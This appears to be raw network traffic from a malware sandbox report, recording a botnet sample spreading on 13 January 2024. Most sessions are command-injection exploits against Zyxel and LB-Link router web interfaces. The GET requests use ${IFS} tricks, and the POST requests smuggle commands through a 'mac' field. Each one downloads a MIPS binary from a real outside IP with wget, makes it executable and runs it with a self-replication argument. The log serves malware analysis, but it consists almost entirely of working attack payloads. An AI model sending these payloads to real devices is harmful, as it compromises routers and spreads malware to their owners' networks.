                                    Jan 13, 2024 19:02:33.158711910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4279192.168.2.1355028208.123.218.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158736944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4280192.168.2.1349308166.251.35.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158787012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4281192.168.2.1346546185.143.131.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158826113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4282192.168.2.1339706159.100.169.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158868074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4283192.168.2.1360676153.4.213.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158911943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4284192.168.2.1353380102.156.193.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158953905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4285192.168.2.1347818173.103.13.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158984900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4286192.168.2.1360414124.252.201.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.159007072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4287192.168.2.1359640141.223.67.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.162029028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4288192.168.2.1338626108.237.164.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.162326097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4289192.168.2.1335704192.186.170.858080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.974179983 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:34.831906080 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:34.992065907 CET1286INHTTP/1.0 400 Bad Request
                                    Server: squid/3.1.23
                                    Mime-Version: 1.0
                                    Date: Sat, 13 Jan 2024 10:03:29 GMT
                                    Content-Type: text/html
                                    Content-Length: 3182
                                    X-Squid-Error: ERR_INVALID_URL 0
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4290192.168.2.134313831.136.205.428080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.995088100 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:37.039911985 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:43.184005976 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4291192.168.2.1339712223.192.70.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.175111055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4292192.168.2.133296880.151.241.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.175338984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4293192.168.2.134760261.33.65.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.175395966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4294192.168.2.1348182118.65.252.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.175471067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4295192.168.2.135531450.234.87.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.175559998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4296192.168.2.135707420.132.40.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.175648928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4297192.168.2.1360864156.189.19.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.175717115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4298192.168.2.1348246162.162.61.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.175801992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4299192.168.2.134525275.184.101.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.175909996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4300192.168.2.1360836223.118.83.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176001072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4301192.168.2.134621059.6.62.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176067114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4302192.168.2.1359900219.134.171.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176137924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4303192.168.2.133963848.87.54.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176228046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4304192.168.2.1346082218.240.255.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176352978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4305192.168.2.134568493.108.107.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176420927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4306192.168.2.13578005.77.155.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176467896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4307192.168.2.135887677.239.246.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176587105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4308192.168.2.1339716102.136.71.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176670074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4309192.168.2.1348598221.76.189.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176738024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4310192.168.2.13380089.216.167.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176842928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4311192.168.2.136078639.252.213.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176908016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4312192.168.2.133320853.190.134.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.176970959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4313192.168.2.1356252170.84.68.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.177031994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4314192.168.2.134318063.210.213.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.177109003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4315192.168.2.135627041.28.140.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.177156925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4316192.168.2.134260842.226.138.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.177233934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4317192.168.2.1358966149.28.11.47443
                                    TimestampBytes transferredDirectionData
